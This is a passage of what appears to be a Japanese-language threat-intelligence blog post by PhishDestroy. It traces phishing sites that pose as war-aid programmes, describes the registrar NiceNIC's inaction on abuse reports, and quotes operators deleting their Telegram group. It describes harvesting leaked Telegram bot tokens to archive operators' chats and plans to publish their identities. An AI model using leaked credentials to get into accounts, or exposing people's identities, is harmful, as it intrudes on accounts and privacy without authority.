このグループをぶっ壊してやるこのグループを削除します
D
デヴォイズ25-03-2026 13:15:35
はいда
— グループが所有者によって削除されました —
そのグループは数分以内に削除された。ボニャの別れの挨拶である「+」と、デヴォイズの「うん」という返事が、すべてを物語っている: 彼らは自分たちの正体が露見したことを知っており、残された手段は証拠を隠滅することだけだった。 しかし、その時点では、データはすでに収集済みだった。
ボニャの示唆に富む発言に注目: 「ウクライナのボットからも攻撃を受けた」 — 両プロジェクト(ウクライナとインドネシア)は同じ運営チームによって運営されており、彼らのインフラが侵害されたのは今回が初めてではないことが確認された。
第8節:これが示すこと
PhishDestroyの仕組み
に表示されるすべてのドメイン phishdestroy.io この自動化されたPipelineを経由する。dopomogvoina[.]sbsも例外ではなかった。
検出
静的解析
インフラマッピング
起源の発見
OSINT
レポートの作成
調査の経緯
2026年3月20日
ドメイン dopomogvoina[.]sbs NICENIC Internationalを通じて登録済み
2026年3月21日
PhishDestroyの自動監視Pipelineによって検出されました
2026年3月21日
完全自動分析が完了しました:インフラストラクチャのマッピング、JSバンドルの難読化解除、WebSocketプロトコルの文書化が完了しました
2026年3月22日
Origin IPが特定された。同じサーバー上で2件目のフィッシングプロジェクト(「HealthCare ID」)が発見された
2026年3月22日
暴露 config.json Telegram API を通じてオペレーターの特定が可能になります
2026年3月23日
ホスティングプロバイダー、Cloudflare、および関連するCERTへの不正利用の報告
2026年3月25日
記事が公開されました。PhishDestroyでドメインレポートが公開されています
これが可能だった理由:PhishDestroyのボット・インテリジェンス・ネットワーク
本調査は、すべて 自動化システム. PhishDestroyのPipelineは、フィッシングドメインを検知するだけでなく、その背後にある運営者のインフラに潜入します。
アクティブ
依然として監視されているボットも存在する
フィッシングキットがTelegramボットのトークンを漏洩させる場合――今回のケースでは、次のような方法で―― config.json — 当社のシステムは、それらを自動的に収集し、オペレーターグループを割り当て、メンバーリストを抽出し、メッセージ履歴をアーカイブします。 2,000体以上のボット 2024年からこの方法で収集されてきた。その中には今も活動中のものもあり、私たちは犯罪者たちがリアルタイムで活動する様子を楽しんでいる――結末はすでに決まっているからだ。
アカウントを削除したり、グループを消去したりした運営者でさえ、手遅れです。彼らが慌てふためく頃には、私たちはすでにすべてを手中に収めています――メッセージのアーカイブ、プロフィールデータ、グループのメンバー情報、連携しているボットまで。 削除しても何も変わらない。 そのデータは以前から存在していましたが、現在は私たちのデータベースに格納されています。
「Жди Меня」— 詐欺師版
この事例は決して珍しいものではなく――これはまさに NiceNICによる組織的な怠慢 そこで、私たちはこれを「メガハッカー」の例として紹介することにしました。「Типичный Мошенник」が正しく指摘したように、ハッカーと詐欺師には違いがあります―― 知性. これらのオペレーターは、ハッカーでもなければ、賢いわけでもない。
PhishDestroyのシステムは、数千ものドメインにわたって、このような証拠を自動的に収集しています。具体的には、ボットの収集、オペレーター間の通信のアーカイブ化、インフラのマッピングなどを行っています。今回の事例は、あまりにも荒唐無稽だったため、公開せざるを得ませんでした。フィッシングキットは市販品レベルであり、OPSECは皆無で、オペレーターたちは発見から数分以内にパニック状態でグループを削除してしまいました。
私たちは、以下を表示するシステムを構築しています。 ドメインレポートページ上で直接、オペレーターの身元を確認 — 詐欺師から被害者へ。ロシアのテレビ番組『Жди Меня』(『Wait for Me』)のような展開だが、その逆だ。2024年から非公開モードで運営されている。アカウントを削除した者を含め、多くの運営者がすでに特定されている。我々は現在、最も 面白い その発表の仕方。お楽しみに。
関連ドメイン
我々の分析により、2つ目のドメインが特定された―― hlpforvpeople[.]sbs — 同じレジストラを通じて登録され、インフラストラクチャのパターンも一致しています。両方のドメインは、当社のデータベースに記録されています:
レジストラの規約違反:NiceNIC International
NiceNIC International Group Co., Limited(香港)は、 複数の詳細な虐待報告 PhishDestroyからの、両者に関するコメント dopomogvoina[.]sbs そして hlpforvpeople[.]sbs. 本記事の公開時点では―― 最初の報告から5日後 — 現時点では何の措置も講じられていない。両ドメインとも引き続き完全に稼働している。
これは単発の事例ではありません。NiceNICは、私たちの調査において繰り返し見られる問題です。レジストラの不正利用に関する連絡先(abuse@nicenic.net) は、証拠が盛り込まれたフィッシングに関する報告に対して、一貫して対応を怠っている。ICANN認定レジストラであり、『レジストラ認定契約(RAA)第3.18条』の拘束を受ける立場にあるにもかかわらず、NiceNICは明らかに何の制裁も受けずに事業を続けている。
NiceNICはロシア語での展開を行っており、販売も行っており、 .ru 同レジストラは高額(約200ドル)でドメインを販売しており、ロシア語圏のユーザーに人気のあるプラットフォームであるVKやTelegramを通じて顧客とやり取りを行っている。同社の顧客層がアンダーグラウンドコミュニティと重なっていることから、不正利用の報告に対して同レジストラが対応しないのは、単なる怠慢なのか、それとも意図的なビジネス戦略なのかという深刻な疑問が生じている。
この調査結果は一部が公表された NiceNICの長期にわたる対応の遅れのため. レジストラがフィッシングによる悪用への対応を拒否した場合、世間に公表することが、残された唯一の責任追及の手段となる。
主なポイント
- 時代の流れについていくには、自動化が唯一の手段です。 フィッシングキットは、わずか数時間で展開され、攻撃ツールとして悪用されます。手作業による検証では、そのスピードに対応しきれないのです。
- オペレーターもミスを犯すものです。 あるサブプロジェクトで設定ファイルが流出したことがきっかけとなり、多国間にわたるフィッシング詐欺の全容が明らかになった。すべてのプロジェクトにおいて完璧なOPSECを維持し続けることは難しい。
- ソーシャルエンジニアリングは、ニュースの動向に合わせて変化していく。 戦争、人道支援、政府の支援プログラムは、苦境に立たされ、その正当性を疑う余地が少ない人々を標的とするため、フィッシング詐欺の餌としてますます悪用されるようになっている。
- インフラの再利用は当たり前となっている。 1台のサーバー、2つのフィッシングプロジェクト、2カ国、そして同じ運営者。インフラのつながりを可視化することで、単一のドメインを単独で分析するよりもはるかに多くのことが明らかになる。
関連研究
PhishDestroyの自動インテリジェンス・Pipelineによるさらなる調査
免責事項: 本調査は、完全にパッシブな偵察および公開APIを通じて実施されました。いかなるシステムに対しても不正アクセスは行われていません。Telegram Bot APIへの呼び出しには、運営者が認証不要のエンドポイントで公開していたトークンを使用しました。本記事に記載されているすべてのドメイン名は、情報セキュリティの標準的な慣例に従い、特定できないように処理されています。